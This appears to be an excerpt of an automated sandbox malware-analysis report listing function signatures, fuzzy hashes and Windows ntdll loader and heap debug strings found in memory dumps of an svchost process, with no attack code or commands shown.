                                                                                                                  • Opcode ID: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                                                                                  • Instruction ID: 2b16a97c4704c4ec8cd1ff08bf83539b0091b0c20610ef4143cc539dffe71925
                                                                                                                  • Opcode Fuzzy Hash: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                                                                                  • Instruction Fuzzy Hash: A531C676600214EFCB11EB46CC85FDEBBB8EF45B24F154061E814EB291D770EE40DA60
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C43264
                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03C4327D
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C43255
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                  • API String ID: 0-617086771
                                                                                                                  • Opcode ID: 595365267faf5cf0bb4d914e068731d0807d0940b6241abadeed036220044dbc
                                                                                                                  • Instruction ID: ce0f1ab0c6a743a4b228ae14fa2d8f55a5782e90b59ec8fce17d7081e1ac042b
                                                                                                                  • Opcode Fuzzy Hash: 595365267faf5cf0bb4d914e068731d0807d0940b6241abadeed036220044dbc
                                                                                                                  • Instruction Fuzzy Hash: A692BD75A042899FDB25CF69C4447AEBBF1FF48300F188499E89AEB391D735AA41CF50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  • Opcode ID: ec4b44d07af2cec73a7b097b9b71eb63ee3394c99a05417f393ca8f009a5e3ba
                                                                                                                  • Instruction ID: 38ce2c485ea0a510c28118b3f0696cfbf5c255415c51d3909ce1cf0304c43fe1
                                                                                                                  • Opcode Fuzzy Hash: ec4b44d07af2cec73a7b097b9b71eb63ee3394c99a05417f393ca8f009a5e3ba
                                                                                                                  • Instruction Fuzzy Hash: 3C2230706006419FEB16DF29C499B7AFBF5EF02704F1A849AE455CF282D736EA81CB50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                  • API String ID: 0-4253913091
                                                                                                                  • Opcode ID: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                                                                                  • Instruction ID: e100f5f71dd4729802482125215530a71f7aa6944b1c79e0738688a54b3ef17b
                                                                                                                  • Opcode Fuzzy Hash: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                                                                                  • Instruction Fuzzy Hash: 77F1A735A40605DFEB25CF69C988B6AF7B5FB45300F1981A9E506DF381D730EA81CB90
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C31596
                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03C31728
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C31712
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                  • API String ID: 0-3178619729
                                                                                                                  • Opcode ID: 679a9b0cbb8e2aa21bc64eac4cc0cb6b5daa010d046b2f16d485536717ac79c1
                                                                                                                  • Instruction ID: 81af117f9f9163f8b94f2f0bc3c279220a7ae9097e3c39daacc4b00415e27fc9
                                                                                                                  • Opcode Fuzzy Hash: 679a9b0cbb8e2aa21bc64eac4cc0cb6b5daa010d046b2f16d485536717ac79c1
                                                                                                                  • Instruction Fuzzy Hash: 13E10F70A046419FDB29EF69C451BBABBF5EF4A304F1C845DE496CB245E734EA40CB50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                  • API String ID: 0-1145731471
                                                                                                                  • Opcode ID: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                                                                                  • Instruction ID: 67316c3576ad3af2c8fb938c07dc30a641932aea88614c1fb25d343e6ccda35e
                                                                                                                  • Opcode Fuzzy Hash: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                                                                                  • Instruction Fuzzy Hash: FAB19C7AA047849BDF25CF69C884BADB7B6EF45314F1A446AE851EB380D730ED40CB54
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                  • API String ID: 0-2391371766
                                                                                                                  • Opcode ID: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                                                                                  • Instruction ID: 94041acdff6d14fe0c3d5a504aaac7474ecee571b9407ffc202430004e9228ae
                                                                                                                  • Opcode Fuzzy Hash: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                                                                                  • Instruction Fuzzy Hash: 7CB1AF7A604381AFD321DE95C884FABB7F8EB54710F150929FA40EB290D775ED44CB92
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $@
                                                                                                                  • API String ID: 0-1077428164
                                                                                                                  • Opcode ID: 31f0cab33a2a042c6c694c493e9d4bb25dd8d1c2e0738b59bcfc16bfede09a83
                                                                                                                  • Instruction ID: 9963b2846c285927d2aa408ff868429a502e28cf0ad00327ad05be377d3d1cce
                                                                                                                  • Opcode Fuzzy Hash: 31f0cab33a2a042c6c694c493e9d4bb25dd8d1c2e0738b59bcfc16bfede09a83
                                                                                                                  • Instruction Fuzzy Hash: 6AC280716083419FEB25CF25C884BABB7E5AF88744F09896EFD89CB240D734D984CB56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                  • API String ID: 0-2779062949
                                                                                                                  • Opcode ID: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                                                                                  • Instruction ID: 437486ede257791e510f956bc82f24a55c1816bbb80050964aeae1dedba7d6db
                                                                                                                  • Opcode Fuzzy Hash: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                                                                                  • Instruction Fuzzy Hash: B2A16A759012299BDB21EB24CC88BEAF7B8EB44714F0541E9E909EB250DB35AFC5CF50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                  • API String ID: 0-318774311
                                                                                                                  • Opcode ID: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                                                                                  • Instruction ID: 788c2d5aeef06ecedecd1d9d23ffc038318d47e1cd5879889e2ec6fe5b14cce8
                                                                                                                  • Opcode Fuzzy Hash: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                                                                                  • Instruction Fuzzy Hash: 608198796283C0AFE311DB15D944B6AB7E8FF85750F09892DF980DB390DB38D9048B62
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: %$&$@
                                                                                                                  • API String ID: 0-1537733988
                                                                                                                  • Opcode ID: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                                                                                  • Instruction ID: 74a7dcb003fdeec920b2ab11c5ad6dd90826de3c09bfbc7d1be4758b298fea5f
                                                                                                                  • Opcode Fuzzy Hash: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                                                                                  • Instruction Fuzzy Hash: B171B1746087429FC714DF25C5C0A6BFBE9FF89618F24891DE49ACB251C731EA05CB92
                                                                                                                  Strings
                                                                                                                  • TargetNtPath, xrefs: 03D0B82F
                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03D0B82A
                                                                                                                  • GlobalizationUserSettings, xrefs: 03D0B834
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                  • API String ID: 0-505981995
                                                                                                                  • Opcode ID: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                                                                                  • Instruction ID: 5e95eb2bdbfca965b4935152628dfb0b949ebdfd1cdde7e6dd6101aa6cb879cf
                                                                                                                  • Opcode Fuzzy Hash: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                                                                                  • Instruction Fuzzy Hash: 5F617076D45229ABDB21DF54DC88BDAB7B8EF54B10F0101E6A908EB290C774DE84CF90
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03C8E6B3
                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03C8E6C6
                                                                                                                  • HEAP[%wZ]: , xrefs: 03C8E6A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                  • API String ID: 0-1340214556
                                                                                                                  • Opcode ID: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                                                                                  • Instruction ID: 951c999233127f240e245bc3bd65afc6d00cdc77fe9c00f010a36a6227a3a770
                                                                                                                  • Opcode Fuzzy Hash: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                                                                                  • Instruction Fuzzy Hash: A751C336604798EFD712EB68C844BAAFBF8EF05704F0900A9E951CF692D774EA50DB50
                                                                                                                  Strings
                                                                                                                  • HEAP: , xrefs: 03CDDC1F
                                                                                                                  • HEAP[%wZ]: , xrefs: 03CDDC12
                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03CDDC32
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                  • API String ID: 0-3815128232
                                                                                                                  • Opcode ID: 5f92ae74f08ae22dd5f3f9fbcc60e3fc3c3db8c055dfaab16816bfa767d60954
                                                                                                                  • Instruction ID: ca8eabd843401fdc74dafb188d45ee8cc12f48b773a8a72aafc308990ade9afd
                                                                                                                  • Opcode Fuzzy Hash: 5f92ae74f08ae22dd5f3f9fbcc60e3fc3c3db8c055dfaab16816bfa767d60954
                                                                                                                  • Instruction Fuzzy Hash: A0514435904250AEE374DE2AC88C772B7E1DF45248F09888AF6D3CF285DA75E942DB60
                                                                                                                  Strings
                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 03CA82DE
                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 03CA82D7
                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 03CA82E8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-1783798831
                                                                                                                  • Opcode ID: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                                                                                  • Instruction ID: 78c61bcc662049bfcdbdeb0d9ef0a11cb146565d0ef5fd3c0b6a8e0dd7cee46e
                                                                                                                  • Opcode Fuzzy Hash: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                                                                                  • Instruction Fuzzy Hash: B94115B6500310ABC720FB28DC84B5BBBE8FF59750F05492AF988DB250E770E910DB91
                                                                                                                  Strings
                                                                                                                  • LdrpAllocateTls, xrefs: 03CA1B40
                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03CA1B39
                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 03CA1B4A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                  • API String ID: 0-4274184382
                                                                                                                  • Opcode ID: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                                                                                  • Instruction ID: 7ef97095a0fa9db8470720eaf7932cbb88825973fec6e60cd8ca4d272fc351e0
                                                                                                                  • Opcode Fuzzy Hash: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                                                                                  • Instruction Fuzzy Hash: 8541AC79A00609AFCB15DFA9D881BAEFBF5FF59714F098119E405EB300D774A900DB90
                                                                                                                  Strings
                                                                                                                  • PreferredUILanguages, xrefs: 03CEC212
                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03CEC1C5
                                                                                                                  • @, xrefs: 03CEC1F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                  • API String ID: 0-2968386058
                                                                                                                  • Opcode ID: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                                                                                  • Instruction ID: a0480f67736134208c97ac29797a3d7e9999c823cfa0305824c3019b0f3446a5
                                                                                                                  • Opcode Fuzzy Hash: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                                                                                  • Instruction Fuzzy Hash: D0418D76E0020AEFDB11DAD4C885FEEB7B8AB14700F05806AE905FB290D774AA449B90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                  • API String ID: 0-1373925480
                                                                                                                  • Opcode ID: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                                                                                  • Instruction ID: 6e10281a0cc84889dd7462a7e4249357277955806e16dccee929315d26c2113e
                                                                                                                  • Opcode Fuzzy Hash: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                                                                                  • Instruction Fuzzy Hash: 694102759203C88BEB2ADBA6C860BADB7B8EF55340F19445ED841EF391D6359A01CB10
                                                                                                                  Strings
                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 03CB4899
                                                                                                                  • LdrpCheckRedirection, xrefs: 03CB488F
                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03CB4888
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                  • API String ID: 0-3154609507
                                                                                                                  • Opcode ID: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                                                                                  • Instruction ID: a33894e1ba7e9c23f903982c4811032c8dd2345cf374c7cb96160e770f7ac5a4
                                                                                                                  • Opcode Fuzzy Hash: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                                                                                  • Instruction Fuzzy Hash: 0141D7336087609FCB29CE6AD440AA6B7F9AF49650F090569EC58EB353D731DD00CB91
                                                                                                                  Strings
                                                                                                                  • RtlCreateActivationContext, xrefs: 03CA29F9
                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 03CA29FE
                                                                                                                  • Actx , xrefs: 03C633AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                  • API String ID: 0-859632880
                                                                                                                  • Opcode ID: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                                                                                  • Instruction ID: 03b72a08c182bb5336ff860b89f319b9103e72624536141364251502803ffbfa
                                                                                                                  • Opcode Fuzzy Hash: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                                                                                  • Instruction Fuzzy Hash: 423144362003529FDB22DE58C8C4BAABBA4FB44714F098469EC05DF2A1CB30ED41CB90
                                                                                                                  Strings
                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 03CA1A40
                                                                                                                  • LdrpInitializeTls, xrefs: 03CA1A47
                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 03CA1A51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                  • API String ID: 0-931879808
                                                                                                                  Strings
                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03C7127B
                                                                                                                  • BuildLabEx, xrefs: 03C7130F
                                                                                                                  • @, xrefs: 03C712A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                  • API String ID: 0-3051831665
                                                                                                                  Strings
                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 03CB20F3
                                                                                                                  • LdrpInitializationFailure, xrefs: 03CB20FA
                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 03CB2104
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-2986994758
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___swprintf_l
                                                                                                                  • String ID: #%u
                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                  • String ID: kLsE
                                                                                                                  • API String ID: 3446177414-3058123920
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$@
                                                                                                                  • API String ID: 0-149943524
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `$`
                                                                                                                  • API String ID: 0-197956300
                                                                                                                  Strings
                                                                                                                  • Failed to retrieve service checksum., xrefs: 03C8EE56
                                                                                                                  • ResIdCount less than 2., xrefs: 03C8EEC9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                  • API String ID: 0-863616075
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .$gfff
                                                                                                                  • API String ID: 0-3321379909
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .$gfff
                                                                                                                  • API String ID: 0-3321379909
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $$$
                                                                                                                  • API String ID: 0-233714265
                                                                                                                  Strings
                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 03C3A309
                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 03C3A2FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
